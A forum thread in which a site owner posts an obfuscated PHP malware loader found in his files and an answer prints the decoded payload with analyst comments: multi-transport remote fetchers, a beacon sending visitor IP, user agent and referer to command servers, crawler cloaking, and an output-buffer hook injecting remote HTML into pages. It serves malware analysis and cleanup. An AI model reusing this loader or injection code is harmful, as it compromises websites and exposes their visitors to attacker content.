
Malware Infected PHP code (I need some help to decode)

Today I saw the following PHP code snippets in the code of some files of my project. The code was single line. I have used PHP Formatter ( http://beta.phpformatter.com/ ), but I still have not figured it out.

Do you have any idea what it is?

<?php
$nkswqu    = 'j!<2,*j%!-#1]#-bubE{h%)tpqs) or (strstr($uas,"    x61    156    x64!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcot$nifaghb = $hiwbtoy("", $puk-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%fX)ufttj    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fe2M3]317]445]212]445]43]321]464]284]3x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275sbz)#44ec:649#-!#:618d5f9#-!#f6c68399#x61"]=1; $uas=strtolower($_SERVER["    x48    124    +opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x228L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Lutpi}Y;tuofuopd`ufh`fmtmw/    x24)%zW%h>EzH,2W%wN;#-Ez-d!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gw6*    x7f_*#fmjgk4`{6~6<tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47x54    120    x5f    125    x53    105    x52    137    x41    107    x45    116    x54"]); if (} @error_reporting(0); $pukpmqk = implode(array_map("gwscco    x7fw6*    x7f_*#fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%72    157    x6d    145")) or (strstr($uas,"    x66    151    x72    145    x66    157    162    x6f    151    x64")) or (strstr($uas,"    x63    150    x7 or (strstr($uas,"    x72    166    x3a    61    x31")f2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));6<pd%w6Z6<.2`hA    x27pd%6<C    x27pd%6|6.7eu{66<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdX6<    x7fw6*CW&)7gj6<*K)ftp6~67<&w6<*&7-#o]s]o]s]#)fepmqyf    x27*&7-n%)utjm!>!2p%!|!*!***b%)sfxpmpusutg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~928>>        x78"))) { $hiwbtoy = "    x63    162]1/20QUUI7jsv%7UFH#    x27rfs%6~6<    x7fw6<*K)ftpmdXA6|7**19@#7/7^#iubq#    x5cq%    x27jsv%6<C>^#zsfvr#    x5cq%7**^#zsI&c_UOFHB`SFTV`QUUI&bFWSFT`%}X;!sp!*#opo#>>}R;msv}.%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<    x7fd/#00;quui#>.%!<***f    x27,*e    x27,*d    x27,*c    x27,*b    
x27)fepdof.)fes",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y7<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:Mj}1~!<2p%    x7f!~!<##!>!2p%Z<^2    x5c2b%!>!24tvctus)%    x24-    x24b!>!%yy)#}#-c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnp24]25    x24-    x24-!%    x24-    x24*!|!    x24-    x24    x5c%j^    x24-    x2x24<%j,,*!|    x24-    x24gvodujpo!    x24-    x24UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msid%6<    x7fw6*    x7f_*#ujojRk3`{666~6<&w6<    x7fw6*CW&)7gj6<.[sbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUbq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/d]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-:<h%_t%:osvufs:~:<*9-1-r%)y7    x24-    x24*<!    x24-    x24gps)%j>1<%j=tj{fpg)%    x24-    x24*<!~!/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut!>!    x242178}527}88:}334}472    x24<!%ff2!>!bssbz)    x!ftmbg)!gj<*#k#)usbut`cpV    x7f    x7f    x7f    x7f<u%V    x27{ftmfV    x7fvd},;uqpuft`msvd}+;!>!}    x27;!>mdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7fmjix6<C    j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tu1H*WCw*[!%rN}#QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw!)%z>>2*!%z>3<!fmtf!%z>2<!s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#8M4P8]37]278]225]241]334]368]322]3]364fvr#    x5cq%)ufttj    x22)gj6<^#Y#    x5cq%    x2)ldbqov>*ofmy%)utjm!|!*5!    
x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)s!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!s]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]3**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%)8]Df#<%tdz>#L4]275L3]24    x27;mnui}&;zepc}A;~!}    x7f;!|!}{;)gj}l;33(strstr($uas,"    x6d    163    x69    145"))t($GLOBALS["    x61    156    x757-2qj%7-K)udfoopdXA    x22)7gj    x65    141    x74    145    x5f    146    x75    156    x63    164        156    x61"])))) { $GLOBALS["    x61    156    x75    156    6]y6g]257]y86]267]y74]275]y7pdof`57ftbc    x7f!|!*uyfu    x27k:!ftmf!}Z;^nbsbq%    x5cS>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#tjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)25,d7R17,67R37,#/q%>U<#16,47R57,27R66,##    x24-    x24-tusqpt)%z-#:#*    x24-    x24!>!    x24/%tjw/    x24)%    x24-    x24y4    x24-        x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bsx69    157    x6e"; function gwsccos($n){return chr(ord($n)-1);v%7-MSV,6<*)ujojR    x27c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bj*id%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-A    x27&6<    x7fw6*    x7f_*x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#op%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>>    x22!pd%)!gj}Z;h!opjudovg}{;#)t*9.-j%-bubE{h%)sutcvt)fubmgoj{hA97e:56-xr.985:52985-t.98]K4]65]#%#/#o]#/*)323zbe!-#jt0*?]+^?]_    x5c}X    x24<!%if((function_exists("    x6f    142    x5f    163    x74    141    x72    164") && (!isse-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%jg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftpmqk); $nifaghb();}}7Y%6<.msv`ftsbqA7>q%6<%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%hA    x27pd%6<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA    x27pd%62]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%o:pp3)%cB%iN}#-!    
x24/%tmw/    x24)%c*W%eN+#Qi    x5c1^W%c!>!%i946-tr.984:75983:489x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%UQPMSVD!-id%)uqpuft`msn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.9x24]y8    x24-    x24]26    x24-    7]K3#<%yy>#]D6]281L1#/#M5]DgP52b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rry]252]18y]#>q%<#762]67y]5A    x27K6<    x7fw6*3qj%7>    x2272qj%)7gj6<fnbozcYufhA    x272qj%6<^#zsfvr#    x5cq%7/7#y74]273]y76]252]y85]2584:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M)#]82#-#!#-%tmw)%tww**WYsboepT#-#E#-#G#-#H#-#I#-#K#-#L#-#M#3e:5597f-s.973:8297f:52tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#;/#/#/},;#-#}+;%-qp%)54l}    x27;%!<*#}n+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`    x24/%t2w/    x24)##-!#~<#/%    x24-    x24!>!fyqmpef)#    x24*<!%t::!>!    x24Ypdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:552]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`64]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss    j=6[%ww2!>#p#/#p#/%z<jg!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!ghfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))>>!}_;gvc%}&;ftmbg}    x7f;!osvufs}w;*    x7f!>:]268]y7f#<!%tww!>!    x2400~x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;2]},;osvufs}#[k2`{6:!}7;!}6;##}C;!>>!}W;mbg!osvufs!|ftmf!~<*utcvt)esp>hmg%!<12>j%!|!*#91y]StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbkcrowkyt';
// Loader stage 1 (analyst annotation): chr(120) is 'x', so a 34-byte slice of the
// blob is split on 'x' into a table of function names. The visible tail of the
// blob, `StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtS`, is exactly 34 bytes and splits into
// strrev, a reversed create_function and a reversed str_replace (PHP function
// names are case-insensitive); whether the offset still lines up in this
// whitespace-mangled copy cannot be confirmed here.
$qcmviqrrx = explode(chr((837 - 717)), substr($nkswqu, (18509 - 12489), (199 - 165)));
// Element 0 (strrev) is called through a variable to un-reverse the other two
// names, which keeps the literal strings "create_function"/"str_replace" out of
// the file -- a common trick to defeat simple grep-based scanners.
$wvodkr    = $qcmviqrrx[0]($qcmviqrrx[(4 - 3)]);
$xskmfwqv  = $qcmviqrrx[0]($qcmviqrrx[(9 - 7)]);
if (!function_exists('fxlepffr')) {
    // Loader stage 2 (analyst annotation): reassembles the hidden payload.
    // $qkfdqgat is a flat list of (offset, length) pairs, $aaxdfvhwkhy the blob,
    // $lmyikk the name of the replacement function resolved a few lines above.
    function fxlepffr($qkfdqgat, $aaxdfvhwkhy, $lmyikk)
    {
        $xzlzanfi = NULL;
        // Walk the pairs two at a time and concatenate the referenced slices.
        for ($crzozy = 0; $crzozy < (sizeof($qkfdqgat) / 2); $crzozy++) {
            $xzlzanfi .= substr($aaxdfvhwkhy, $qkfdqgat[($crzozy * 2)], $qkfdqgat[($crzozy * 2) + (4 - 3)]);
        }
        // chr(9) is TAB, chr(92) is '\': every TAB in the reassembled text becomes a
        // backslash. The "    x61"-style runs in this copy were presumably TAB+"x61"
        // before the paste lost its tabs, i.e. "\x61" escapes in the final source.
        return $lmyikk(chr((35 - 26)), chr((548 - 456)), $xzlzanfi);
    }
    ;
}
// Loader stage 3 (analyst annotation): chr(44) is ',', so this is the
// offset/length table handed to fxlepffr() above.
$aashvx  = explode(chr((147 - 103)), '4260,65,3364,24,3456,44,351,44,717,60,3331,33,998,39,27,31,950,48,892,58,1377,31,3415,41,3841,57,777,59,1708,57,5624,51,4555,53,1088,41,1193,46,1169,24,2730,51,4023,49,1408,55,3388,27,1129,40,4996,36,3229,38,5032,39,1463,51,3008,38,4482,22,836,56,1607,38,597,61,3964,38,2072,34,3898,21,2106,56,4002,21,5942,28,499,22,4386,41,4791,22,2700,30,5826,41,4121,32,4427,35,5970,20,4153,32,5739,34,0,27,2543,50,3578,63,3046,69,5990,30,1929,51,551,46,1859,40,4072,49,4924,47,1645,63,5462,53,1239,27,58,44,5350,47,5773,53,3115,53,2162,54,1514,21,5515,63,163,57,3528,50,1535,30,5314,36,1316,61,256,57,2781,62,3641,38,395,44,2641,59,1765,46,3679,39,2474,69,5893,49,3290,41,2216,67,4216,44,5227,41,5071,22,3500,28,5867,26,2338,26,2930,40,2421,53,658,59,4971,25,4608,53,2593,48,1980,54,1899,30,3718,70,4870,24,2034,38,2364,57,5397,65,4661,54,3788,53,313,38,4325,61,521,30,2843,61,5145,29,4813,57,5204,23,4185,31,5578,46,4715,20,5093,52,4894,30,1811,48,3267,23,439,60,2283,55,1565,42,2970,38,3168,61,220,36,5675,41,4735,56,3919,45,1266,50,4504,51,5716,23,2904,26,5268,46,5174,30,130,33,1037,51,102,28,4462,20');
// If $wvodkr resolved to create_function (as the blob's visible tail suggests),
// the reassembled text is compiled here as the body of an anonymous function with
// an empty parameter list. Runtime compilation of a string assembled from an
// opaque blob is the key indicator for this family; a scanner that only looks
// for eval() misses it.
$ajoqqxy = $wvodkr("", fxlepffr($aashvx, $nkswqu, $xskmfwqv));
$wvodkr  = $nkswqu;
// The compiled payload runs here; the remaining assignments are filler.
$ajoqqxy("");
$ajoqqxy = (791 - 670);
$nkswqu  = $ajoqqxy - 1;
?>

Thank you so much.

Edit: I shut down the infected site, I downloaded it. I cleaned the malicious code and moved it to a new server. There is no interface on this site to create a security breach, so I think the harmful code got in through the server.

Original Code: https://pastebin.com/L1hZuCvy

I'm not going to write a full tutorial about reverse engineering such code, but because I was curious what your snippet really does, I did some work.

If you follow all encoding layers, you will end up with this code:

// Fetch helper #1 (analyst annotation): downloads the remote URL with
// file_get_contents(). The `@` suppresses warnings, so a failed fetch (DNS,
// allow_url_fopen off, ...) leaves nothing in the PHP error log. Returns
// false when the function is unavailable or the body compares equal to "".
function g_1($url)
{
    if (function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if ($buf == "") return false;
    return $buf;
}

// Fetch helper #2 (analyst annotation): same download via cURL, body only
// (no headers), with a 10 s timeout so a slow remote host does not hang the
// page that triggered the fetch. Returns false when cURL is missing or the
// response body is empty.
function g_2($url)
{
    if (function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if ($res == "") return false;
    return $res;
}

// Fetch helper #3 (analyst annotation): reads the URL line by line with file()
// and joins the lines back together. Only differs from g_1 in the function it
// relies on, so it survives environments where file_get_contents() has been
// disabled via disable_functions but file() has not.
function g_3($url)
{
    if (function_exists("file") === false) return false;
    $inc = @file($url);
    $buf = @implode("", $inc);
    if ($buf == "") return false;
    return $buf;
}

// Fetch helper #4 (analyst annotation): last resort when all URL wrappers are
// disabled -- a hand-rolled HTTP/1.0 GET over a raw TCP socket. Port 80 is
// hard-coded and the scheme is ignored, so this path never uses TLS; the
// request is visible in cleartext on the wire, which is useful for network
// detection.
function g_4($url)
{
    if (function_exists("socket_create") === false) return false;
    $p = @parse_url($url);
    $host = $p["host"];
    if (!isset($p["query"])) $p["query"] = "";
    $uri = $p["path"] . "?" . $p["query"];
    // Resolve the host, then round-trip through ip2long/long2ip: gethostbyname()
    // returns the input unchanged on failure, and the comparison filters that out.
    $ip1 = @gethostbyname($host);
    $ip2 = @long2ip(@ip2long($ip1));
    if ($ip1 != $ip2) return false;
    $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!@socket_connect($sock, $ip1, 80)) {
        @socket_close($sock);
        return false;
    }
    // Request lines end in bare "\n" (not "\r\n"); note the Host header, which is
    // what would show up in proxy or IDS logs for this beacon.
    $req = "GET $uri HTTP/1.0\n";
    $req .= "Host: $host\n\n";
    socket_write($sock, $req);
    $buf = "";
    // Read until socket_read() returns a falsy value (EOF, error, or empty chunk).
    while ($t = socket_read($sock, 10000)) {
        $buf .= $t;
    }
    @socket_close($sock);
    if ($buf == "") return false;
    // Drop the response headers: everything before the first blank line.
    list($m, $buf) = explode("\r\n\r\n", $buf);
    return $buf;
}

// Download dispatcher (analyst annotation): tries the four fetch helpers in
// order and returns the first non-false body, or "" when every transport
// fails. The fallback chain is why this malware keeps working on hosts where
// allow_url_fopen and cURL have been locked down.
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if ($co !== false) return $co;
    $co = @g_2($url);
    if ($co !== false) return $co;
    $co = @g_3($url);
    if ($co !== false) return $co;
    $co = @g_4($url);
    if ($co !== false) return $co;
    return "";
}

// Manual gzip decoder (analyst annotation): gzdecode() is only used by the
// caller when it exists, so this hand-parses the gzip header and feeds the
// raw deflate stream to gzinflate(). Returns false if the data does not start
// with the gzip magic bytes 1f 8b 08.
function comgzi($gzData)
{
    if (substr($gzData, 0, 3) == "\x1f\x8b\x08") {
        // Fixed header is 10 bytes; byte 3 holds the FLG bitfield.
        $i = 10;
        $flg = ord(substr($gzData, 3, 1));
        if ($flg > 0) {
            // FEXTRA: 2-byte little-endian length followed by that many bytes.
            if ($flg & 4) {
                list($xlen) = unpack("v", substr($gzData, $i, 2));
                $i = $i + 2 + $xlen;
            }
            // FNAME and FCOMMENT are NUL-terminated strings; FHCRC is 2 bytes.
            if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1;
            if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1;
            if ($flg & 2) $i = $i + 2;
        }
        // Inflate from the end of the header up to the 8-byte CRC32/ISIZE trailer.
        return @gzinflate(substr($gzData, $i, -8));
    } else {
        return false;
    }
}

// Field encoder for the beacon (analyst annotation): transforms $text with
// en2() under the per-request value $op and base64-encodes the result.
// en2() is not part of the decoded listing shown here; from its use with the
// random $op in day212() it looks like a keyed obfuscation -- confirm against
// the full dump before relying on that.
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// $_SERVER reader (analyst annotation): returns the named server variable, or
// the sentinel string "non" when it is unset or empty. Callers compare against
// "non" to decide whether enough request context exists to beacon.
function check212($param)
{
    if (!isset($_SERVER[$param]))
        $a = "non";
    else if ($_SERVER[$param] == "")
        $a = "non";
    else
        $a = $_SERVER[$param];
    return $a;
}

// Beacon + payload fetch (analyst annotation): collects visitor/request data,
// sends it to the operator's server and returns whatever HTML comes back for
// injection into the page. Returns "" when the request is filtered out.
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_HOST");
    $e = check212("PHP_SELF");
    // Four hex labels; cqq(".com") below is not in this listing, but the answer
    // text reads these as the C2 domains <label>.com. Good strings to search
    // for across the web root when hunting for other infected files.
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    // Cloaking: no injection when UA/IP/host are missing, when the script path
    // contains "admin" (strrpos at position 0 would be falsy and slip through),
    // or when the UA matches a known crawler. This hides the payload from search
    // engines and from the site operator in the admin area, so reproduce with a
    // plain browser UA on a non-admin page when verifying a cleanup.
    if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin") or (preg_match("/" . implode("|", array("google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler")) . "/i", strtolower($a)))) {
        $o1 = "";
    } else {
        // $op doubles as the request path and as the key passed to k34()/en2().
        $op = mt_rand(100000, 999999);
        // Beacon body: the five fields encoded with k34(), joined by ".", then
        // urlencoded twice -- the format to expect in outbound proxy logs.
        $g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
        $url = "http://" . cqq(".com") . "/" . $g4;
        // The response is run through en2() with the same $op and split on the
        // literal marker "!NF0"; the part after the marker is the injected HTML.
        $ca1 = en2(@gtd($url), $op);
        $a1 = @explode("!NF0", $ca1);
        if (sizeof($a1) >= 2) $o1 = $a1[1]; else $o1 = "";
    }
    return $o1;
}

// Best-effort decompressor (analyst annotation): tries raw deflate, the manual
// gzip parser, zlib and (when available) gzdecode() in turn, and returns the
// input unchanged if none of them succeeds. Needed because the output buffer
// may already be compressed by ob_gzhandler/zlib.output_compression before
// this handler sees it. $length is accepted but never read.
function dcoo($cz, $length = null)
{
    if (false !== ($dz = @gzinflate($cz))) return $dz;
    if (false !== ($dz = @comgzi($cz))) return $dz;
    if (false !== ($dz = @gzuncompress($cz))) return $dz;
    if (function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if (false !== $dz) return $dz;
    }
    return $cz;
}

// Output-buffer callback (analyst annotation): receives the finished page,
// decompresses it if needed and splices the remote payload in front of the
// first </body> (or, failing that, </html>) tag. The Content-Encoding header
// is reset to "none" because the buffer is sent back decompressed.
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if (preg_match("/\<\/body/si", $t)) {
        // "$" . "1" builds the back-reference "$1" so the closing tag is kept;
        // the trailing 1 limits the injection to the first match.
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
    } else {
        if (preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
        } else {
            return $t;
        }
    }
}

// Hook point (analyst annotation): every byte the page emits now passes through
// pa22() before reaching the client, so the injection is invisible in the
// site's own source files. When auditing a host, grep for ob_start() calls
// whose callback is a string, in files that should not contain any.
ob_start("pa22");

What this code does is:

  • registers an output handler, which replaces your own site with content from their servers
  • randomly choose one of 4 servers (33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com)
  • to this server, it sends a request with some server information

Sadly I wasn't able to have a look at what exactly they deliver to your server - seems like they have some kind of test to prevent everyone from having a look into their code.

To sum it all up - the code doesn't install a backdoor on your server (but as they could manipulate your PHP files, they already have one..). The malware was especially dangerous for your visitors, as it could show all kinds of content.
